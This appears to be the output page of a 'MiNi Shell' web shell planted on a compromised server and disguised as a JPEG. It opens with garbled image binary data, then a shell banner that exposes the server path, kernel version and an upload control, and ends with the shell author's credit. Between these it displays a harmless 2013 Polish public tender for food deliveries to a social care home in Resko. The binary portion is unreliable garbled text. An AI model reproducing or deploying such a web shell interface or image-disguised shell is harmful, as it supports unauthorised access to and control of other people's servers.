JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131122/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131122/479466-N-2013.html

<p class="kh_header"><b>Resko: Sukcesywne dostawy artykułów spożywczych dla DPS w Resku w roku 2014</b><br>
<b>Numer ogłoszenia: 479466 - 2013; data zamieszczenia: 22.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Wojska Polskiego 40, 72-315 Resko, woj. zachodniopomorskie, tel. 091 3951830, faks 091 3951337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> dps.resko.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pomoc społeczna pozostała z zakwaterowaniem.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy artykułów spożywczych dla DPS w Resku w roku 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy artykułów spożywczych dla DPS w Resku w roku 2014
w częściach: 	
1. Warzywa i owoce - kod  CPV 031 00000-2
2. Jaja świeże -  kod  CPV 031 42500-3
3. Produkty zwierzęce, mięso i produkty mięsne  -  kod  CPV 151 00000-9
4. Konserwy i przetwory z mięsa  -  kod  CPV 151 31000-5
5. Ziemniaki -  kod  CPV 032 10000-6
6. Ryby przetworzone i konserwowe oraz warzywa i owoce mrożone -  kod  CPV 150 000000-8
7. Przetworzone owoce i warzywa -  kod  CPV 153 30000-0
8. Produkty mleczarskie -  kod  CPV 155 00000-3
9. Produkty przemiału ziarna -  kod  CPV 156 00000-4
10. Pieczywo, świeże wyroby piekarskie i ciastkarskie -  kod  CPV 158 10000-9
11. Różne produkty spożywcze -  kod  CPV 158 00000-6.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>7.1. W przetargu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych i spełniający wymogi art. 22 ust. 1, tj. Wykonawcy, którzy spełniają poniższe warunki : 
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - na podstawie dokumentów wymienionych w punkcie 7 WYKAZU WYMAGANYCH DOKUMENTÓW   - ( pkt. 7.2. SIWZ).  Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania.
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  technicznym zgodnym z wymogami HACCP i osobami zdolnymi do wykonania zamówienia; 
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oferta - wypełniony formularz ofertowy  (zał. 1) wraz z załącznikami nr 1/1 do 1/11 UWAGA! - Formularz/e należy wypełnić zgodnie z rubrykami i składać jako załącznik do oferty
- umowę należy złożyć jako załącznik do OFERTY (zał.2)  
- Oświadczenie wynikające z art. 22 i 24 ustawy Prawo Zamówień Publicznych -  Oświadczenie to należy składać jako załącznik do OFERTY wg wzoru    przekazanego przez Zamawiającego   (zał. 3) 
Pełnomocnictwo do podpisania oferty i zawartych w niej dokumentów, jeżeli oferta i dokumenty nie zostały podpisane przez osoby upoważnione do podejmowania zobowiązań w imieniu Wykonawcy zgodnie z wpisem o reprezentacji w stosownym dokumencie uprawniającym do występowania w obrocie prawnym.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> dps.resko.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej, ul. Woj.Polskiego 40, 72-315 Resko, I piętro budynku administracji - dział kadr.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2013 godzina 11:00, miejsce: Dom Pomocy Społecznej, ul. Woj.Polskiego 40, 72-315 Resko, I piętro budynku administracji - dział kadr.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz	kg 700;Banan kg	1250;Botwinka świeża pęczek	kg 50;Brzoskwinia świeża	kg	150;Burak czerwony kg	2000;Cebula kg700;Cytryna kg 160;Grejpfrut kg 1000
Jabłka kg 2500; Kalafior świeży szt	300;Kapusta biała kg 1200;Kapusta czerwona	kg 250;Kapusta pekińska kg 300;Kiwi	kg 450;Koper zielony świeży - pęczek	kg 55;Mandarynka  kg 500;Marchew  świeża kg	2500;Nektaryna kg 250;Ogórek świeży kg 940; Papryka świeża kg 250; Pieczarka świeża kg	200; Pietruszka korzeń kg 	490; Pietruszka natka - pęczek kg 50; Pomarańcze kg	350; Pomidor kg 1000; Por kg 500;Rzodkiewka - pęczek szt	200;Sałata lodowa szt	500;Sałata zielona szt	500;Seler korzeń	kg 500;Szczypior z cebulą - pęczek	szt 250;Truskawki świeże kg 100;Winogron kg	150;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.10.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa jaj świeżych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa jaj świeżych KL.B 2 M 53-63 g w ilości 30 000 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mięsa i produktów mięsnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z piersi kurczaka - element  tuszki kurczęcej obejmujący mięsień piersiowo powierzchniowy, bez przylegającej skóry oraz części chrzęstno-kostnych kg	200;
Korpusy drobiowe świeże  kg	80; Kości spożywcze wieprzowe świeże powstałe w wyniku oddzielenia ręcznego lub mechanicznego od mięsa, z pozostałościami tkanki mięsnej  ( kości schabowe, od karkówki, biodrówki, żeberkowe) kg	500; Łopatka wieprzowa świeża  z kością bez skóry kg	2200; Schab  wieprzowy z kością,
słonina ze schabu całkowicie zdjęta kg 620; Słonina świeża bez skóry kg 800;Szynka świeża wieprzowa, bez kości,bez skóry, bez tłuszczu kg 600; Udko z kurczaka  świeże
(pałka+udziec) element tuszki kurczęcej obejmujący kości - udową, piszczelową i strzałkową, łącznie z otaczającymi je mięśniami. Uda właściwie umięśnione, nie dopuszcza się wylewów krwawych w mięśniach	kg 1850;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa wędlin i przetworów z mięsa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Blok szynkowy wieprzowy kg 240; Baleron wieprzowy gotowany kg 30;Kaszanka z kaszą jęczmienną perłową kg	710;Kiełbasa biała wieprzowa surowa kg	150;Kiełbasa kanapkowa wieprzowa	kg 240;Kiełbasa krakowska parzona lub równoważna kg 240;
Kiełbasa podwawelska kg 240; Kiełbasa rawska	kg 320; Kiełbasa szynkowa wieprzowa	kg 250;Kiełbasa toruńska kg 800; Kiełbasa żywiecka wieprzowa parzona	kg 240; Konserwa turystyczna 290-300 g	szt 400;Mielonka wieprzowa w konserwie - w galarecie	kg 240; Parówki drobiowe kg	450;Parówki wieprzowe	kg 200; Pasztet drobiowy  w puszce 150-160 g szt	600; Pasztetowa drobiowa luksusowa kg	280;
Polędwica sopocka kg 100;Szynka  wieprzowa wędzona  parzona 	kg 30;Szynka drobiowa kg	180;Szynka konserwowa wieprzowa	kg 240;		
Wędzonka krotoszyńska	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa ziemniaków jadalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki jadalne Wineta  lub równoważne pakowane  w worki siatkowate po 30 kg.
Każda dostarczona partia oznaczona datą pakowania w ilości 30 000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa ryb przetworzonych i konserwowych oraz owoców i warzyw mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły mrożone  	kg	300; Filety rybne z morszczuka  mrożone bez glazury, bez ości, bez skóry kg	560;Kalafior mrożony kg	300;Makrela wędzona kg 160;Płaty śledziowe Matias	kg 200; Szpinak mrożony 490-500 g	szt 100;Truskawka mrożona 	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa przetworzonych owoców i warzyw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananasy w syropie 565-600 g	szt 150;Brzoskwinie w syropie 800-820g	szt 150; Chrzan  0,9-1 kg	szt	50; Ćwikła 400-420 g szt 100;Dżem nisko słodzony 370-400 g szt	600; Dżem wieloowocowy wysoko słodzony 0,9-3 kg kg 500;Fasola sucha Jaś 380-400g	szt	300; Fasolka szparagowa konserwowa 2,5-2,6 kg szt	700;Galaretki owocowe 80-100 g szt	1600;Groch łuskany 490-500g	szt 350; Groszek konserwowy 2,55-2,6 kg	szt 230; Kapusta kiszona  kg	1000; Keczup 950-1000 g szt	100;Kompot truskawkowy 0,9 l szt 600;Kompot wiśniowy 0,9 l szt	200;Kompot z aronii 0,9 l	szt	900; Koncentrat pomidorowy 30% 850-900 g Złoty Bażant lub równoważny szt  30;Kukurydza konserwowa 350-400 g szt	30;Musztarda 0,9-1 kg	szt	160; Ocet spirytusowy 10% 480-500 ml	szt 60;Ogórek kiszony 0,9-1 l	szt 1000; Ogórek konserwowy  0,9-1 l szt 800; Olej roślinny do smażenia  4,5-5 l litr 100; Papryka konserwowa 0,9-1 l	szt	300;Przecier ogórkowy 0,9-1 l	szt 10;Sok pomidorowy bez cukry 1,5-2 l	szt	100;Sok wielowarzywny bez cukru 1,5-2 l	szt 100;Szczaw konserwowy 900-950 g	szt	120;Śledź w oleju 160-170 g	szt 400; Śledź w sosie pomidorowym 160-170 g szt	400;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa produktów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt naturalny bez cukru 120-130 g szt	500; Jogurt owocowy 90-100 g szt	10400;
Margaryna  250g  Palma lub równoważna	kg 220;Margaryna miękka 20% tł. 1 kg	szt	840; Masło  ekstra 82% - 200 g kg	1350; Maślanka 1 l litr 500; Mleko półtłuste 2% folia 	litr	16000;Ser Feta naturalny  260-270 g żółty 3% tł. szt	145; Ser żółty salami lub równoważny	kg 500; Serek topiony - zegar (trójkąty) - 8 szt.w op. op 2000;Śmietana 18% 400 ml szt	2800;Twaróg półtłusty kostka	kg 1200;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa produktów przemiału ziarna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kaszka błyskawiczna mleczno-ryżowa owocowa  480-500 g szt 40; Kasza jęczmienna  0,9-1 kg 560 kg; Kasza kukurydziana 0,9-1 kg	kg 50; Kasza manna 0,9-1 kg	kg	120; Kasza pęczak 0,9-1 kg	kg 40; Kleik ryżowy błyskawiczny 150-160 g	szt 220; Mąka pszenna  0,9-1 kg kg	 2000; Mąka ziemniaczana  0,9-1 kg kg 40; Płatki kukurydziane 0,9-1 kg	kg 100; Płatki owsiane 0,9-1 kg kg	160; Ryż biały długoziarnisty 0,9-1kg kg 650;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa pieczywa oraz świeżych wyrobów piekarskich i ciastkarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka montowa 48-50 g	szt	36000; Bułka grahamka 48-50 g szt	10000;Bułka tarta 0,95-1 kg	kg 270; Chleb dyniowy kroj.400-420 g szt	1750; Chleb graham kroj.400-420g szt	1750; Chleb słonecznikowy krojony 400-420g szt 1750; Chleb szczeciński  krojony 0,6-0,7 kg szt	15000; Chleb żytni razowy krojony 400-420 g	szt	1500;Ciasto babka wielkanocna kg	15; Ciasto makowiec kg	30;Ciasto mazurek wielkanocny kg 15;Ciasto metrowiec kg	15; Ciasto miodownik kg 15; Ciasto sernik	kg 40;Ciasto szarlotka	kg 15;Ciastka biszkopty 100-110 g	szt 180;Cisto jogurtowe	kg	30;Cisto keks kg	30; Drożdże piekarskie prasowane 	kg 25; Pączki 90-100 g	szt	300; Rogal wyborowy 95-100g szt	1000; Suchary dietetyczne kg 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa różnych produktów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aromaty -fiolki 10 ml szt 60; Bazylia suszona 20-25 g	szt 200; Budyń śmietankowy w proszku 40-50 g	szt	820;Bulion rosołowy uniwersalny  w proszku kg	80; Cukier biały kryształ kg	szt	2600; Cukier puder 490-500 g	szt 40; Cukier wanilinowy 32-35 g szt	500; Cukierki czekoladowe kg	40; Cynamon 18-20 g szt 150; Czekolada 95-100 g mleczna	 szt 40; Czosnek granulowany 490-500 g	szt 26;Estragon 18-20g	szt 50; Herbata czarna Saga ekspresowa  100 szt. lub równoważna szt	80; Herbata indyjska granulowana 90-100 g szt 720; Herbata owocowa 90-100 g nie napój herbaciany rozpuszczalny szt	80; Kakao 90-100 g szt	450; Kawa Inka 150 g lub równoważna szt 1000; Kisiel 40-50g	 szt	1600;Kminek 18-20 g szt 50;Koper zielony susz 240-250 g kg 16;Kwasek cytrynowy 20-25 g szt	300; Liść laurowy 200-210g	szt	20; Majeranek  95-100 g szt	40; Majonez 590-600 g	szt 300; Makaron 490-500g Lubella różne formy lub równoważny szt 1400; Makaron spaghetti 480-500 g Lubella lub równoważny szt	200;Masa makowa z bakaliami 900-950g 	szt 30; Oregano suszone 20-25 g szt	100; Papryka słodka mielona 480-500 g	szt	15
Pieprz czarny naturalny 490-500g	szt	40; Pietruszka zielona susz 240-250 g	szt	15; Proszek do pieczenia 20-25 g	szt	100; Przyprawa  złocista do kurczaka 40-50 g	szt	150; Przyprawa Warzywko 0,95-1kg lub równoważna	szt	120;
Przyprawa do piernika 20-25 g szt 50; Przyprawa do ziemniaków 0,95-1 kg szt 20; Przyprawa Gyros 490-500 g	szt	14; Sos pieczarkowy w proszku 40-50 g	szt	10; Sos Winiary do spaghetti 950-1000 g lub równoważny	szt	12; Sól spożywcza jodowana kg	kg	700; Syrop owocowy na słodziku dla diabetyków 330-350 ml	szt	40;Syrop owocowy wysoko słodzony 6-6,50 kg	szt	10;Tymianek  suszony18-20 g	szt	50;Ziele angielskie  490-500g	szt	25;Zioła prowansalskie suszone 40-50g	szt	150; Zupa w proszku barszcz biały Winiary 50-55 g lub równoważny szt	300; Zupa w proszku barszcz czerwony Winiary  50-55 g lub równoważny szt	400; Zupa w proszku żurek Winiary 50-55 g lub równoważna	szt	200; Żelatyna spożywcza 450-500g	szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com